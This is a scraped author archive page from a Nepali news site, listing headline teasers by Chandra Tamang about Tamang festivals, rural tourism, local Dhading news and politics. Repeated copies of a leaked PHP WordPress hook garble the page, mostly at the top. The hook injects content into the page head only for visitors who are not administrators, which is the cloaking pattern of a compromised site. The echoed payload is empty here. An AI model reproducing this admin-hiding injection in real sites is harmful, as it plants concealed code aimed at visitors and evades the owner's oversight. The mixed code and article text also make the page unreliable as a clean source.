if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); चन्द्र तामाङ

आइतबार , जेठ ३, २०८३

if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999);

All News By: चन्द्र तामाङ

मकवानपुरको कैलाशमा सोनाम ल्होछारको भव्य तयारी, दर्जनभन्दा बढी राष्ट्रिय कलाकारहरूको प्रस्तुति रहने

धादिङ । मकवानपुरको कैलाश गाउँपालिकामा सोनाम ल्होछारको भव्य तयारी गरिएको छ । २८६०औँ सोनाम ल्होछार डुक/मु ल्होको अवसरमा....

गङ्गाजमुना गाउँपालिका स्तरीय राष्ट्रपति रनिङ सिल्ड प्रतियोगितामा मन्डली मा.वि प्रथम

धादिङ। उत्तरी धादिङ जिल्लाको गङ्गाजमुना गाउँपालिका स्तरीय राष्ट्रपति रनिङ सिल्ड प्रतियोगितामा मन्डली मा.वि ले १३ वटा....

२८६०औँ सोनाम ल्होछारको अवसरमा कैलाश–२ र बेनीघाट रोराङ–१ ले संयुक्त रूपमा मेला आयोजना गर्ने

धादिङ । तामाङ समुदायको सबैभन्दा ठुलो सांस्कृतिक पर्व २८६० औँ सोनाम ल्होछार २०८० को अवसरमा मकवानपुरको कैलाश–२ र धादिङको....

वडाध्यक्ष घिसिङले छात्रछात्रालाई प्रोत्साहित गर्न आफ्नो सेवा-सुविधा कटाएर दिए पुरस्कार

काठमाडौँ । मकवानपुरको कैलाश गाउँपालिका–२ का वडाध्यक्ष राजेन्द्र घिसिङले छात्रछात्रालाई प्रोत्साहित गर्नका लागि....

राष्ट्रिय फोटो पत्रकार समूह नेपाल बागमती प्रदेश अध्यक्षमा नारायण सिलवाल निर्विरोध चयन

धादिङ । फोटा पत्रकारहरूको सङ्गठन राष्ट्रिय फोटो पत्रकार समूह नेपाल बागमती प्रदेश अध्यक्षमा धादिङका पत्रकार नारायण....

एक्सन नेपालद्वारा बेनीघाट रोराङ–१ का विद्यार्थीलाई छात्रवृत्ति वितरण

धादिङ । एक्सन नेपालले धादिङको बेनीघाट रोराङ–१ का विद्यार्थीहरूलाई छात्रवृत्ति वितरण गरेको छ । शुक्रवार वडा नम्बर १....

गाउँ घुम्न मन त पर्छ, तर कुन गाउँ जाने ?

हिन्दु धर्मावलम्बीहरूको ठुलो चाड दशैँ भर्खरै सकियो । लगातार वर्षाका कारण हिले दशैँ भयो । थुप्रै मानिसहरूका लागि दशैँ....

आहा ! मनमाेहक पाँचपाेखरी 

अग्लो पहाडमाथि लमतन्न परेको भूभागमा पाँच वटा पोखरीहरू, वरिपरि अग्ला होचा थुम्काहरू, जहाँबाट नियाल्दा एकातिर तँछाडमछाड....

नेपालमा सबैभन्दा पहिला शासन गर्ने ‘गाेपाल वंश’का सन्ततिहरूकाे गाउँ, -कुन्छाल

एउटा सुन्दर हरियाली थुम्काकाे काखमा काँचो इँटाले बनेका उस्तै खालका अग्ला-अग्ला दुई/तीन तले गाउँले घरहरू एकै ठाउँमा....

ओझेलमा नेपालकै अग्लो झरना

नेपाल प्राकृतिक सुन्दरताले भरिपूर्ण छ । हिमाल, पहाड तराइ र तिनमा बनेका डाँडा, पाखा-पखेरा, उपत्यका, खोला, नदीनाला, गुफा,....

बन्दीपुरको छायाँमा सुन्दर गाउँ रामकोट 

तनहुँको बन्दीपुर आन्तरिक तथा बाह्य पर्यटकमाझ परिचित छ । बन्दीपुर भन्ने बित्तिकै मौलिक कला र संस्कृतिले पोतिएको सुन्दर....

लिम्बुवानका अन्तिम राजा हिलिहाङ याेङहाङ र उनकाे दरबार

नेपाल एकीकरणको क्रममा वल्लो किराँत र माझ किराँतलाई कब्जामा लिएपछि गोरखाली फौज अरुणखाेला तरेर तत्कालीन विजयपुर राज्य....

६० वर्ष पुरानाे विद्यालयकाे नलेखिएकाे इतिहास र अभावकाे दर्दनाक कथा (विशेष रिपोर्ट)

“जरुङ गाउँमा स्कुल त ल्यायो, तर विद्यार्थीलाई कहाँ राखेर पढाउने भन्ने टुङ्गो थिएन । गाउँलेसँग सल्लाह गर्दा गाउँभन्दा....

बेनीघाट–रोराङ-१ मा बारीमै कुहियो एक करोड रुपैयाँ भन्दा बढीको तरकारी, स्तराेन्नती भएन सडक

धादिङको बेनीघाट रोराङ–१, जरुङ गाउँका आशिष तामाङ २०७८ मा वैदेशिक रोजगारीबाट स्वदेश फर्किए । गाउँमा तरकारी खेती गरेर....

तपाईँकाे पर्खाइमा ‘रम्मापुर मध्यवर्ती सामुदायिक होमस्टे’

बर्दियाको बारबर्दिया नगरपालिका–७, रम्मापुरका रामकृष्ण चौधरी विगत पाँच वर्षअघि एउटा विदेशी प्रोजेक्टमा काम गर्थे ।....

हाेमस्टे कसरी सञ्चालन गर्ने ?

नेपालमा पछिल्लो दशकयता ग्रामीण पर्यटन फस्टाउँदै गएको छ । ग्रामीण पर्यटन भन्ने बित्तिकै होमस्टे (घरबास) पर्यटनको कुरा....

बाह्रसय रुपैयाँमा होटल सुरु गरेकी इलामकी पवि दिदी, अहिले करोडौँको मालिक (भिडियाे)

“मेरो होटलमा आउँदा पाहुनाहरूलाई आफ्नो घरमा पुगे जस्तो महसुस होस् र यहाँको खाना आफ्नै आमाले पकाएको जस्तो मिठो होस् भन्ने....

धार्मिक सद्भाव र सहिष्णुताकाे मुहानः हलेसी महादेव 

“विभिन्न ठाउँमा धार्मिक लडाइँहरू भएको सुनिन्छ, ती मानिसहरूले एक पटक हलेसीमा आएर धार्मिक सहिष्णुता सिक्नुपर्ने हो कि....

वैकुण्ठ–कैलाश कसरी बन्यो पर्यटकीय ‘हब’ ? यस्ताे छ नालीबेली (भिडियो)

विगत पाँच–सात वर्ष अघिसम्म मकवानपुरकै ‘विकट बस्ती’को उपमा भिरेर बसिरहेको वैकुण्ठ र कैलाश गाउँले अहिले आफ्नो परिचय....

१६औं अन्तर्राष्ट्रिय सगरमाथा दिवसको अवसरमा ठमेल पर्यटन विकास परिषद्को नेतृत्वमा प्रभातफेरी हुने

काठमाडाैं । १६औं अन्तर्राष्ट्रिय सगरमाथा दिवसको अवसरमा ठमेल पर्यटन विकास परिषद्को नेतृत्वमा प्रभातफेरी हुने हुने....

बुद्धत्व प्राप्त गरेपछि बुद्धले पहिलोपटक आफ्नो परिवारसँग भेटघाट गरेको ठाउँ, -कुदान

महामानव गौतम बुद्ध बुद्धत्व प्राप्त गरेपछि विभिन्न ठाउँमा ज्ञान बाँड्दै हिँडिरहेका थिए । घर-गृहस्थी, सबथोक त्यागेर....

बुद्धिस्ट अन्तर्राष्ट्रिय ट्राभल मार्ट–२०२३ काे उपलब्धि के हाे ?

बुद्धको जन्मस्थल लुम्बिनीको पर्यटन प्रवर्द्धन गर्ने मुख्य उद्देश्यका साथ लुम्बिनीमा आयोजित दोस्रो 'बुद्धिस्ट....

लुम्बिनीमा ‘दोस्रो बुद्धिस्ट अन्तर्राष्ट्रिय ट्राभल मार्ट’ सुरु (तस्बिरहरू)

काठमाडाैं । लुम्बिनीमा 'दोस्रो बुद्धिस्ट अन्तर्राष्ट्रिय ट्राभल मार्ट' सुरु भएको छ । आज (मे ११)मा सुरु भएको मार्ट मे १३....

वैकुण्ठमा घाटु नाच मेला भव्यताका साथ सम्पन्न (तस्बिरहरू)

धादिङ । मकवानपुरको कैलाश गाउँपालिका–२, वैकुण्ठमा घाटु नाच मेला भव्यताका साथ सम्पन्न भएको छ । वैशाख २३ र २४ गते दुई दिन....

सामान्य उपचार गर्न पनि सदरमुकाम जानुपर्ने बाध्यता हटाउँदै ग्रामीण अस्पताल

कपिल चौलागाई खनियावास गाउँपालिकाको सामुदायिक अस्पताल (ग्रामीण अस्पताल) धादिङबेसीबाट करिब ५ घण्टाको सकसपूर्ण....

वैकुण्ठ गाउँमा यही वैशाख २३ र २४ गते घाटु नाच मेला लाग्दै, आँखा चिम्लेर नाच्ने घाटु नाच के हाे ?

मकवानपुरको कैलाश गाउँपालिका वडा नम्बर २ स्थित वैकुण्ठ गाउँमा यही वैशाख २३ र २४ गते घाटु नाच मेला लाग्दै छ । प्राकृतिक....

आहा ! मनमोहक बाहुबली झरना

नेपालमा अहिले गर्मी मौसम छ । तराइमा उखरमाउलो गर्मी छ, पहाडमा गरम गरम । हिमाली क्षेत्रको चिसो नै हुने भयो । तर, यो मौसममा....

बेनीघाट रोराङ–१ का बासिन्दाकाे खबरदारीपछि कैलाश–२ ले सार्ने भयाे मरणघाट

काठमाडौं । धादिङको बेनीघाट रोराङ–१ का बासिन्दाको विरोधपछि मकवानपुरको कैलाश–२ ले निर्माणाधीन मरणघाट सार्ने भएको छ ।....

धादिङको खानेपानी मुहानमाथि मकवानपुरको मरणघाट ! विवादपछि निर्माण कार्य स्थगित

काठमाडौं । मकवानपुरको कैलाश गाउँपालिका–२ ले धादिङको बेनीघाट रोराङ–१ को खानेपानी मुहान परिसरमा मरणघाट बनाउन थालेपछि....

हाेटल हायात रिजेन्सीमा अरबाैँकाे भ्रष्टाचार ! हिसाब पेश गर्न सरकारकाे तीनदिने अल्टिमेटम

काठमाडाैं । तारा विकास समितिमार्फत सरकारकाे लगानीमा सञ्चालित हाेटल हायात रिजेन्सीमा अरबाैँकाे भ्रष्टाचार भएकाे....

“घुम्न पैसा होइन, सपना चाहिन्छ”, –पुष्कर शाह (विश्व साइकलयात्री)

पुष्कर शाह  ... अनि मास्टर बन्न छोडेर संसार पढ्न निस्किएँ म दोलखाको एउटा दुर्गम गाउँमा जन्मेको । मैले स्कुल पास....

“पर्यटन दशक वा महोत्सव मनाउँदैमा पर्यटक आउँदैन”, –आङछिरिङ शेर्पा

काठमाडौं । पर्यटनविद् आङछिरिङ शेर्पाले पर्यटन दशक वा महोत्सव मनाउँदैमा पर्यटकको सङ्ख्या नबढ्ने बताएका छन् । गत....

आन्तरिक पर्यटकको ‘हब’ बन्दै डाँफे-मुनाल पार्क, नयाँ वर्षमा पर्यटकको घुइँचो

काठमाडौं । मकवानपुरको कैलाश गाउँपालिका-२ मा बनेको डाँफे-मुनाल पार्क आन्तरिक पर्यटकको हब बन्दै गएको छ । नयाँ वर्ष २०८० को....

नयाँ वर्ष आइसक्याे, कहाँ घुम्न जाने ?

नयाँ वर्ष २०८० सुरु हुन अब केही दिन मात्रै बाँकी छ । पुरानो वर्षलाई बिदाइ र नयाँ वर्षलाई स्वागत गर्न विभिन्न उत्सवहरूको....

नयाँ वर्षकाे पूर्वसन्ध्यामा ठमेलमा भव्य सांस्कृतिक कार्यक्रम तथा सडक महोत्सव हुँदै

काठमाडाैं । नेपाली नयाँ वर्ष २०८० को पूर्वसन्ध्यामा पर्यटकीय नगरी ठमेलमा भव्य सांस्कृतिक कार्यक्रम हुने भएको छ ।....

नेपालमा ‘सोलो ट्रेकिङ’ बन्द गर्नुको कारण के हो ? (भिडियाे)

सन् २०१९ को अन्त्यतिर सुरु भएको विश्वव्यापी कोभिड महामारीका कारण थला परेको पर्यटन क्षेत्र अझै पनि पूर्ववत् अवस्थामा....

नेपाल उद्योग वाणिज्य महासङ्घको निर्वाचनमा पर्यटन व्यवसायी सुवेदीको उम्मेदवारी किन ?

काठमाडौं । पर्वतीय पर्यटन व्यवसायीहरूको छाता सङ्गठन, ट्रेकिङ एजेन्सीज एसोशिएसन अफ नेपाल (टान)का निवर्तमान अध्यक्ष एवम्....

विश्वकै विशाल गुफा ‘हाङ सोन डोङ्ग’का आश्चर्यजनक तथ्यहरू

विश्वमा थरी थरीका गुफाहरू छन् । तिनका विशेषताहरू पनि फरक फरक छन् । तर यहाँ चर्चा गर्न लागिएको गुफा विश्वकै सबैभन्दा....

महाभारत पर्वत शृङ्खलाको यात्रा -२: “शैलुङलाई नचिथोरौँ !”

(नाेटः याे पहिलाे भाग पढ्नु भएकाे छैन भने पढ्नुहाेस् है ! अनि मात्रै रमाइलाे हुने छ यात्रा) पहिलाे भागः -महाभारत पर्वत....

महाभारत पर्वत श्रृङ्खलाकाे यात्रा: खैलीङदेखि शैलुङसम्म

पिता जी निकै सौखिन हुनुहुन्थ्यो । छानोलाई थेग्न पिँढीको डिलमा उभ्याइएको खाँबोमा किला ठोकेर रेडियो झुन्ड्यायो अनि....

आर्थिक अभावका कारण उपचार नपाउँदा मृत्यु कुर्दै १५ वर्षकी सानी थिङ

धादिङ । आर्थिक अभावका कारण उपचार नपाउँदा धादिङको बेनीघाट रोराङ–१, जरुङका १५ वर्षीय सानी थिङ तामाङ मृत्युको दिन कुर्दै....

राजारानीले फिल्म हेर्ने दरबारभित्रको त्यो फिल्म हल

काठमाडौं । नेपालमा चलचित्र हलको इतिहास त्यति लामो छैन । तर दरबारभित्र रंगमञ्चको चलन भने धेरै पहिलेदेखि सुरु भएको हो ।....

बेनीघाट रोराङका उत्कृष्ट कृषक सम्मानित 

धादिङ । धादिङको बेनीघाट रोराङ गाउँपालिकाले पालिकाभित्रका उत्कृष्ट कृषकलाई सम्मानित गरेको छ । गाउँपालिकाले “पालिका....

दक्षिण एसियाकै ठुलो गुफामा बेनीघाट-रोराङ गाउँ कार्यपालिकाको बैठक सम्पन्न 

काठमाडौं । दक्षिण एसियाकै ठुलो गुफा, नोहक गुफामा धादिङको बेनीघाट रोराङ गाउँ कार्यपालिकाको बैठक सम्पन्न भएको छ । गुफाको....

तस्बिरमा ‘शैलुङ ज्याङछ्युब छ्याेर्तेन’काे  सु-प्राण प्रतिष्ठा  एवम् वाङ समारोह 

दोलखा र रामेछापको सङ्गमस्थल प्रसिद्ध पर्यटकीय क्षेत्र शैलुङमा निर्मित “शैलुङ ज्याङ्छयुब छ्योर्तेन”(बोधि चैत्य) को....

शैलुङमा निर्मित ‘ज्याङ्छ्युब छ्योर्तेन’को प्राण-प्रतिष्ठासहित भव्य समारोहबीच समुद्घाटन 

काठमाडौं । दोलखा र रामेछापको सङ्गमस्थल प्रसिद्ध पर्यटकीय क्षेत्र शैलुङमा निर्मित “शैलुङ ज्याङ्छयुब छ्योर्तेन”(बोधि....

भिटाेफ गण्डकी प्रदेशको आठौँ वार्षिक साधारण सभा सफलतापूर्वक सम्पन्न 

काठमाडाैं ।  गाउँ पर्यटन प्रवर्द्धन मञ्च  (भिटाेफ) नेपाल गण्डकी प्रदेशको  आठौँ वार्षिक साधारण सभा सफलतापूर्वक सम्पन्न....

शैलुङमा बन्याे ‘ज्याङ्छयुब छयोर्तेन स्तुपा’, भव्य समारोहबीच उद्घाटन हुँदै

काठमाडाैं । दोलखाको प्रसिद्ध पर्यटकीय क्षेत्र शैलुङमा निर्माण गरिएको 'शैलुङ ज्याङ्छयुब छयोर्तेन' (बोधि चैत्य) को भव्य....

तारा एयर दुर्घटनाकाे कारणः ‘चालक दलको त्रुटि’

काठमाडाैं । मुस्ताङको जोमसोममा दुर्घटना भएको तारा एयरको ट्विनअटर जहाजमा चालक दलको त्रुटि भेटिएको दुर्घटना जाँच आयोगले....

गुराँसकाे राजधानीः  तीनजुरे-मिल्के-जलजले

‘गुराँस’को राजधानी भनेर चिनिने तीनजुरे मिल्के जलजले क्षेत्र अन्तर्गत तेह्रथुमको तीनजुरे, सङ्खुवासभाको जलजले र....

ग्रामीण पर्यटनलाई पर्यटन व्यवसायको उपक्षेत्रको रूपमा अघि बढाइने 

काठमाडाैं । बागमती प्रदेश सरकारले ग्रामीण पर्यटनलाई पर्यटन व्यवसायको उपक्षेत्रको रूपमा अघि बढाइने भएको छ । बागमती....

उपेक्षामा ऋषेश्वर महादेव, लाेप हुँदै जात्रा 

केही वर्ष अघिसम्म फागुन शुक्ल प्रतिपदाको दिनदेखि नै धादिङको बेनीघाट रोराङ-१ स्थित जरुङ गाउँ ढ्याङ्ग्रोको आवाजले....

त्रिभुवन राजपथलाई पर्यटन मार्ग घोषणा गरिँदै

काठमाडाैं । पहाड र तराइ जोड्ने मुलुककै पहिलो मार्ग त्रिभुवन राजपथलाई बागमती प्रदेश सरकारले पर्यटन मार्ग घोषणा गर्ने....

आज ग्याल्पाे ल्होसार मनाइँदै, कसरी मनाउँछन् यो पर्व ?

शेर्पा समुदायले मनाउने सांस्कृतिक पर्व ग्याल्पो ल्होसार विविध कार्यक्रम आयोजना गरी आज मनाइँदै छ । प्रत्येक वर्ष फागुन....

बागमती प्रदेशलाई सांस्कृतिक पर्यटनको केन्द्रको रूपमा विकास गरिने 

काठमाडौं । बागमती प्रदेश सरकारले प्रदेशलाई सांस्कृतिक पर्यटनको केन्द्रको रूपमा विकास गर्ने भएको छ । बागमती प्रदेश....

पर्यटन प्रवर्द्धनमा सामाजिक सञ्जाल: वरदान कि अभिशाप ?

सन् २०२० को सेप्टेम्बरतिर तनहुँको एउटा डाँडा एकाएक चर्चामा आयो । जतिबेला विश्वव्यापी कोरोना महामारीका कारण नेपाल....

आज ‘भ्यालेन्टाइन डे’, कसरी भयो यसको सुरुवात ?

आज भ्यालेन्टाइन डे अर्थात् प्रणय दिवस । हरेक वर्ष फेब्रुअरी १४ मा विश्वभर यो दिवस मनाइन्छ । पश्चिमा देशमा विशेष रूपमा....

पशुप्राणी हत्या निषेधित क्षेत्र ‘चुम भ्याली’मा “अहिंसा शताब्दी महोत्सव” हुँदै

काठमाडाैं । गोरखाको चुम उपत्यकामा वैशाखमा ‘चुम श्याग्या शताब्दी महोत्सव’ आयोजना हुने भएको छ । अहिंसा क्षेत्र घोषणा....

‘सौराहा फुड फेष्टिवल -२०७९’ को तयारी पुरा

काठमाडौं । चितवनको पर्यटकीय नगरी सौराहामा पर्यटक लक्षित ‘सौराहा फुड फेष्टिवल २०७९’ को तयारी पुरा भएको छ । ‘प्राकृतिक....

जरुङ गाउँका रङ्गहरूः गाउँ एक, रूपरङ्ग अनेक (तस्बिरहरू)

गाउँ नै गाउँले भरिएको देश हो नेपाल । नेपालको वास्तविक सुन्दरता र चित्र हेर्न यहाँका गाउँ हेर्नुपर्छ । गाउँहरू त गहना....

अवैध अफिम खेती नष्ट: विकल्प देऊ सरकार ! 

काठमाडाैं । जिल्ला प्रहरी कार्यालय धादिङले जिल्लाको बेनीघाट-रोराङ गाउँपालिका-१, मा लगाइएको अवैध अफिम खेती नष्ट गरेको छ....

आरोहीहरूको गाउँ, ‘बेदीङ’ 

दोलखा जिल्लाको गौरीशङ्कर गाउँपालिका-९, मा अवस्थित बेदीङ गाउँ हेर्दा जति सुन्दर देखिन्छन्, अन्य विशेषताहरूले पनि....

चराकाे राजधानी, ‘अरुण भ्याली’

अरुण उपत्यका विश्वकै सबैभन्दा गहिरो उपत्यका हो । यो उपत्यका समुन्द्री सतहभन्दा तीन हजार ६ सय मिटरकाे गहिराइमा अवस्थित छ....

त्रिभुवन विमानस्थलका प्रमुख ठाकुर निलम्बित

काठमाडौं । त्रिभुवन विमानस्थलका महाप्रबन्धक प्रेमनाथ ठाकुर निलम्बनमा परेका छन् । थाई स्माइल एयरलाइन्सका कर्मचारीसँग....

त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलको सेवा, सुविधा तथा सरसफाइमा क्रमिक सुधार 

काठमाडाैं । संस्कृति पर्यटन तथा नागरिक उड्डयन मन्त्री सुदन किरातीकाे कडा निर्देशनपछि त्रिभुवन अन्तर्राष्ट्रिय....

‘भ्यालेन्टाइन्स् डे’ मनाउन उपयुक्त काठमाडाैं वरिपरिका गन्तव्यहरू

अहिले संसारभरि नै प्रेम गर्नेहरूको महोत्सव 'भ्यालेन्टाइन्स वीक' चलिरहेको छ । प्रत्येक वर्ष फेब्रुअरी ७ देखि १४ सम्म....

आफूमाथिको आरोप पुष्टि गर्न रबी लामिछानेलाई कान्तिपुरका अध्यक्ष सिरोहियाको चुनौती

काठमाडौं । कान्तिपुर मिडिया ग्रुपका अध्यक्ष तथा प्रबन्ध निर्देशक कैलाश सिरोहियाले राष्ट्रिय स्वतन्त्र पार्टी....

रबीलाई पत्रकार महासङ्घको च्यालेन्जः -“नेपाली प्रेस कुनै पनि दल वा व्यक्तिको धम्कीबाट विचलित हुनेछैन” 

काठमाडाैं । नेपाल पत्रकार महासङ्घले राष्ट्रिय स्वतन्त्र पार्टीका सभापति रबी लामिछानेले पत्रकार सम्मेलनमा दिएको....

रवि लामिछानेको सांसद पद खारेज, पार्टी सभापति र मन्त्री पद पनि गयो

काठमाडौं । सर्वोच्च अदालतले राष्ट्रिय स्वतन्त्र पार्टीका सभापतिसमेत रहेका उपप्रधान तथा गृहमन्त्री रवि लामिछानेको....

हाेमस्टेकाे सञ्चालन कसरी गर्ने ? यसका मापदण्डहरू के-के हुन् ? 

नेपालमा पछिल्लो दशकयता ग्रामीण पर्यटन फस्टाउँदै गएको छ । ग्रामीण पर्यटन भन्ने बित्तिकै होमस्टे (घरबास) पर्यटनको कुरा....

‘रुबी भ्याली फार्म ट्रिप’मा सहभागी हुन ‘भिटाेफ’ नेपालको अपिल 

काठमाडौं । गाउँ पर्यटन प्रवर्द्धन मञ्च (भिटाेफ) नेपालले यही माघ (१८-२०) गर्न लागिएकाे 'रुबी भ्याली फार्म ट्रिप'मा सहभागी....

तस्बिरमा हेरौँ ‘डाँफे-मुनाल पार्क’काे भव्य ल्हाेछार मेला 

मकवानपुरको कैलाश गाउँपालिका-२, वैकुण्ठस्थित डाँफे-मुनाल पार्कमा “सोनाम ल्होछार विशेष सांस्कृतिक मेला -२०७९” भव्यताका....

सोनाम ल्होछार संसारकै प्राचीन संस्कृति हो – परशुराम तामाङ

तामाङ समुदायको सबैभन्दा ठूलो चाड सोनाम ल्होछारको आज पूर्वसन्ध्या । यस ल्होछारको पूर्वसन्ध्यामा विभिन्न किसिमका....

“सोनाम ल्हाेछार तामाङको मात्रै होइन, सबै नेपालीको पर्व हो”, -परशुराम तामाङ (भिडियाे)

तामाङ समुदायको सबैभन्दा ठुलो सांस्कृतिक पर्व हो, सोनाम ल्हाेछार । यस वर्षको सोनाम ल्हाेछार यही माघ ८ गते परेको छ । यसपालि....

वैकुण्ठकाे डाँफे-मुनाल पार्कमा हुने “सोनाम ल्होछार मेला”को तयारी पूरा 

काठमाडौं । पर्सी माघ ८ गते मकवानपुरको कैलाश गाउँपालिका-२, वैकुण्ठस्थित डाँफे-मुनाल पार्कमा हुने "सोनाम ल्होछार विशेष....

विमान दुर्घटनाले स्तब्ध पर्यटन क्षेत्र, ज्यान गुमाउनेहरूको सम्झनामा दीप प्रज्वलन 

काठमाडौं । आइतबार पोखरामा भएको यती एयर विमान दुर्घटनाबाट स्तब्ध पर्यटन क्षेत्रका सङ्घसंस्थाहरूले सामूहिक दीप....

“यती एयर दुर्घटनाः नेपालको पर्यटन क्षेत्रलाई ठूलो धक्का” -टान

काठमाडौं । ट्रेकिङ एजेन्सीज एसोसिएसन अफ नेपाल (टान)ले आज आइतबार भएको यती एयरको विमान दुर्घटना नेपालको समग्र पर्यटन....

घुमघामका कुराः उहिले ‘बटुवा’ भनिन्थ्यो, अहिले ‘पर्यटक’ 

पहिले-पहिले अहिले जस्तो सडक तथा हवाई यातायातको सुविधा थिएन । एक ठाउँबाट अर्को ठाउँसम्म पुग्न धेरै समय लाग्थ्यो र कठिन....

विश्व-विख्यात विश्वविद्यालयबाट ‘मानार्थ विद्यावारिधि’काे उपाधिद्वारा सम्मानित सापकाेटा काे हुन् ?

काठमाडाैं । सफल पर्यटन व्यवसायी एवम् समाजसेवी राम प्रसाद सापकोटा (कमल) लाई 'वर्ल्ड युनिभर्सिटी अफ लिडरसिप एण्ड....

सरकारको न्यूनतम साझा नीति तथा कार्यक्रममा ‘पर्यटन क्षेत्र’बारे के छ ? 

सात दल सहभागी सरकारले भर्खरै आफ्ना न्यूनतम साझा नीति तथा कार्यक्रम सार्वजनिक गरेकाे छ । सरकार सञ्चालन गर्न बनाइएको....

“सात वटै प्रदेशमा ‘चन्द्रागिरि हिल्स’ जस्तै एकीकृत पर्यटकीय गन्तव्यको विकास गर्ने योजना बनाइरहेका छौँ” चन्द्र ढकाल

काठमाडौं । ग्लोबल आइएमई बैंकका अध्यक्ष चन्द्र ढकालले नेपालको ७ वटै प्रदेशमा काठमाडौंको चन्द्रागिरि हिल्स जस्तै एकीकृत....

ग्लोबल आइएमई बैंक र बैंक अफ काठमाण्डाैंबीच एकीकृत कारोबार शुभारम्भ (तस्बिरहरू)

ग्लोबल आइएमई बैंक र बैंक अफ काठमाण्डाैंबीच एकीकृत कारोबार सुरु भएको छ ।  दुई बैंकबीच मर्जर सम्झौता भएको ७ महिनापछि....

मानसिक समस्याका कारण ठमेलवासीलाई दुःख दिने व्यक्तिलाई अध्यागमनमा बुझाइयो 

काठमाडौं । ठमेल पर्यटन विकास परिषद्ले विगत ६ महिनादेखि मानसिक सन्तुलन गुमाएर ठमेलका पर्यटन व्यवसायी र घरधनीलाई दुःख....

विश्वका घुम्नै पर्ने २३ गन्तव्यकाे सूचिमा ‘मुस्ताङ’

अमेरिकी समाचारमाध्यम 'केवल न्यूज नेटवर्क' (सीएनएन) र चर्चित बेलायती ट्राभल म्यागेजिन 'काेन्डे नास्ट ट्राभलर'ले सन् २०२३....

चन्द्रागिरि हिल्सको अध्यक्षमा हेमराज ढकाल

काठमाडौं । चन्द्रागिरि हिल्स लिमिटेडको अध्यक्षमा हेमराज ढकाल चयन भएका छन् । २१ पुसमा बसेको सञ्चालक समितिको बैठकले....

टापुहरू मिलेर बनेकाे सानाे देश ‘माल्दिभ्स’काे पर्यटनबाट केही सिक्ने कि ? 

साना-साना टापुहरू मिलेर बनेको सानो देश हो, माल्दिभ्स । दक्षिण एसियामा श्रीलङ्का र भारतको दक्षिण-पश्चिममा अवस्थित....

गुफाडाँडामा आन्तरिक पर्यटकको चहलपहल

काठमाडौं । सिन्धुपाल्चोकको मेलम्ची- ९ गुफाडाँडामा आन्तरिक पर्यटकको चहलपहल बढेको छ । वि.सं. २०७५ मा राष्ट्रपति....

धादिङको रुवी भ्यालीलाई पर्यटकीय गन्तव्य बनाउन जुट्यो भिटोफ नेपाल, तीन दिने अध्ययन भ्रमणमा जाँदै 

काठमाडौं । गाउँ पर्यटन प्रवर्द्धन मञ्च (भिटोफ) नेपालले आगामी माघ ७ देखि ९ सम्म धादिङको रुवी भ्याली गाउँपालिका-४, स्थित....

दावा याङ्जुम शेर्पा वासिङ्टनका लागि पर्यटन सद्भावना दूत नियुक्त

काठमाडौं । दावा याङ्जुम शेर्पा अमेरिकाको वासिङ्टनका लागि पर्यटन सद्भावना दूत नियुक्त भएकी छन् । दोलखास्थित रोल्वालिङ....

पर्यटकको सङ्ख्या बढेसँगै सुध्रिन थाल्यो श्रीलङ्काको अर्थतन्त्र 

काठमाडौं । कोभिड १९ महामारी, बाह्य ऋण, आन्तरिक राजनीतिक अस्थिरता, आर्थिक अनियमितता लगायत कारणले ध्वस्त बनेको....

डाँफे-मुनाल पार्कमा सोनाम ल्होछार विशेष सांस्कृतिक मेला हुने 

काठमाडौं । आगामी माघ ८ गते २८५९औँ सोनाम ल्होछारको अवसरमा मकवानपुरको कैलाश गाउँपालिका-२, वैकुण्ठस्थित डाँफे-मुनाल....

“रि-थिङ्किङ टुरिजम” एण्ड ‘कन्जर्भेटिभ’ टुरिजम बोर्ड 

"देशको प्राकृतिक तथा सांस्कृतिक सम्पदा एवम् वातावरणको संरक्षण र संवर्द्धन गर्दै पर्यटन व्यवसायको विकास, विस्तार एवम्....

ब्युँतियो पर्यटन क्षेत्र, सन् २०२२ मा भित्रिए ६ लाख १४ हजार १४८ पर्यटक

काठमाडौं । सन् २०२२ मा ६ लाख १४ हजार १४८ जना विदेशी पर्यटक नेपाल भित्रिएका छन् । सन् २०१९ को अन्त्यमा सुरु भएको....

पुरा भयो पोख्रेलीको सपना, उद्घाटन भयो अन्तर्राष्ट्रिय विमानस्थल

